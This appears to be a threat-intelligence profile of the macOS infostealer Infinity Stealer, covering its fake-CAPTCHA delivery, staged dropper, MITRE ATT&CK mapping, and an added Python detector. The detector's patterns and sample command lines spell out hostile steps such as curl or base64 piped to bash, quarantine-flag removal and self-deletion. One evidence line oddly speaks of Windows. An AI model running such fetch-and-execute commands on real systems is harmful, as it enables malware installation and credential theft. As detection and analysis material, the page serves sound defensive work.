
Infinity Stealer

Infinity Stealer is a macOS-targeting infostealer delivered through ClickFix-style social engineering. Observed campaigns use fake Cloudflare CAPTCHA or verification pages to trick victims into opening Terminal and pasting a malicious, sometimes base64-obfuscated, curl command.

That command launches a multi-stage infection chain. A Stage-1 Bash dropper downloads and decodes the next payload, removes macOS protections such as the quarantine flag, writes a Stage-2 loader to disk (to /tmp in reported cases), passes command-and-control information via environment variables, executes the loader, and deletes itself. The Stage-2 component is a native macOS loader compiled with Nuitka, which unpacks and runs the final Python 3.11 stealer payload, identified as UpdateHelper[.]bin.

Reported capabilities include theft of browser credentials, macOS Keychain entries, cryptocurrency wallet data, plaintext secrets such as .env files, and screenshots. The malware exfiltrates stolen data over HTTP POST requests, performs anti-analysis checks for sandboxed or virtualized environments, introduces random delays to hinder analysis, and sends Telegram notifications to the operators after exfiltration.

Malwarebytes described this as the first observed and documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python infostealer. Reporting has linked the campaign to domains such as update-check[.]com, and the Stage-1 Bash template was noted as resembling code previously seen in macOS stealers such as MacSync/SHub, suggesting possible shared builder reuse.
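As an added illustration of how a defender might surface the Stage-1 dropper behaviour described above in process telemetry (example code written for this page, not code from Malwarebytes, Mallory or the malware itself): a small Python scorer that unwraps base64 layers inside a command line and weights the dropper traits the summary lists. The event format, indicator weights, alert threshold and sample command lines are all constructed assumptions.

```python
import base64
import re

# Weighted heuristics for the Stage-1 dropper traits described above: base64-wrapped
# curl, quarantine-flag removal, a loader dropped in /tmp, C2 data passed via environment
# variables, and self-deletion. Weights and threshold are assumptions, not vendor values.
INDICATORS = {
    "curl_piped_to_shell": (re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b"), 3),
    "base64_decoded_to_shell": (re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b"), 3),
    "quarantine_flag_removed": (re.compile(r"\bxattr\s+(-d\s+com\.apple\.quarantine|-c)\b"), 2),
    "loader_in_tmp": (re.compile(r"/tmp/\S+"), 1),
    "env_var_prefixed_exec": (re.compile(r"\b[A-Z_][A-Z0-9_]*=\S+\s+/tmp/"), 2),
    "self_deletion": (re.compile(r"\brm\s+-f\s+\"?\$0"), 2),
}
ALERT_THRESHOLD = 5
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def decode_layers(text, depth=2):
    """Return the text plus any printable base64 payloads nested inside it."""
    layers = [text]
    if depth == 0:
        return layers
    for token in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text: leave it alone
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            layers.extend(decode_layers(decoded, depth - 1))
    return layers

def analyze(event):
    """Score one process event of the form {'parent': str, 'cmdline': str}."""
    hits = {name for layer in decode_layers(event["cmdline"])
            for name, (pattern, _) in INDICATORS.items() if pattern.search(layer)}
    score = sum(INDICATORS[name][1] for name in hits)
    if hits and event.get("parent") == "Terminal":  # pasted into Terminal, as in the lure
        score += 1
    return {"score": score, "hits": sorted(hits), "alert": score >= ALERT_THRESHOLD}

# Constructed sample events, not captured telemetry; example.invalid is a placeholder.
_ENCODED = base64.b64encode(b"curl -fsSL https://example.invalid/stage1.sh | bash").decode()
SAMPLE_EVENTS = [
    {"parent": "Terminal", "cmdline": "curl -fsSL https://example.invalid/README.md -o README.md"},
    {"parent": "Terminal", "cmdline": f"echo '{_ENCODED}' | base64 -d | bash"},
    {"parent": "bash", "cmdline": "curl -s https://example.invalid/p | base64 -d > /tmp/stage2; "
     "xattr -d com.apple.quarantine /tmp/stage2; chmod +x /tmp/stage2; "
     "C2_HOST=example.invalid /tmp/stage2; rm -f \"$0\""},
]
```

Calling `analyze` on each entry of `SAMPLE_EVENTS` flags the base64-wrapped paste and the dropper-style command (score 7 each) while the plain file download scores 0; the base64 unwrapping is what lets the curl-to-shell rule fire on the obfuscated variant.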

MITRE ATT&CK

Techniques & procedures

17 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access (2 techniques)

T1566 Phishing (evidence count: 1)

These campaigns mimic the familiar “Verify You are a Human” tests commonly used by websites to distinguish legitimate users from bots.

T1566.002 Spearphishing Link (evidence count: 1)

The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare.

Execution (2 techniques)

T1059.004 Unix Shell (evidence count: 3)

Victims are tricked into pasting a malicious curl command into the macOS Terminal, installing a Python-based infostealer compiled with Nuitka for enhanced evasion.

T1204 User Execution (evidence count: 3)

Victims are prompted to press specific keyboard combinations, which ultimately result in the download and execution of malicious software on Microsoft Windows systems.

Stealth (5 techniques)

T1027 Obfuscated Files or Information (evidence count: 1)

asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal.

T1036 Masquerading (evidence count: 1)

Infinity Stealer targets macOS via fake Cloudflare CAPTCHA... It spreads via ClickFix, tricking users with fake Cloudflare CAPTCHA pages.

T1070.004 File Deletion (evidence count: 2)

The dropper decodes the payload, writes the Stage-2 binary, removes macOS protections, executes it, passes C2 data, and then deletes itself.

T1497 Virtualization/Sandbox Evasion (evidence count: 2)

It detects analysis environments and adds random delays to evade detection.

T1497.003 Time Based Checks (evidence count: 1)

It detects analysis environments and adds random delays to evade detection.

Credential Access (2 techniques)

T1555 Credentials from Password Stores (evidence count: 3)

Infinity Stealer can: steal credentials from Chromium-based browsers and Firefox; extract macOS Keychain entries.

T1649 Steal or Forge Authentication Certificates (evidence count: 2)

Infinity Stealer can: steal credentials from Chromium-based browsers and Firefox; extract macOS Keychain entries.

Discovery (2 techniques)

T1497 Virtualization/Sandbox Evasion (evidence count: 2)

It detects analysis environments and adds random delays to evade detection.

T1497.003 Time Based Checks (evidence count: 1)

It detects analysis environments and adds random delays to evade detection.

Collection (2 techniques)

T1005 Data from Local System (evidence count: 2)

The final payload, UpdateHelper[.]bin, is a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots.

T1113 Screen Capture (evidence count: 2)

The final payload, UpdateHelper[.]bin, is a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots.

Command and Control (1 technique)

T1105 Ingress Tool Transfer (evidence count: 2)

The fake Cloudflare CAPTCHA tricks users into pasting a Terminal command that fetches a Stage-1 Bash dropper.

Exfiltration (2 techniques)

T1041 Exfiltration Over C2 Channel (evidence count: 1)

All stolen data is exfiltrated via HTTP POST requests to the C2 server, with a Telegram alert sent to attackers upon completion.

T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol (evidence count: 2)

The final payload, UpdateHelper[.]bin, is a Python 3.11 stealer that collects browser credentials, Keychain entries, crypto wallets, .env files, and screenshots, exfiltrating data via HTTP.

Other (1 technique)

T1562 Impair Defenses (evidence count: 1)

The dropper decodes the payload, writes the Stage-2 binary, removes macOS protections, executes it, passes C2 data, and then deletes itself.

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Type: domain
Value: masked on the public page
Latest sighting: 3 months ago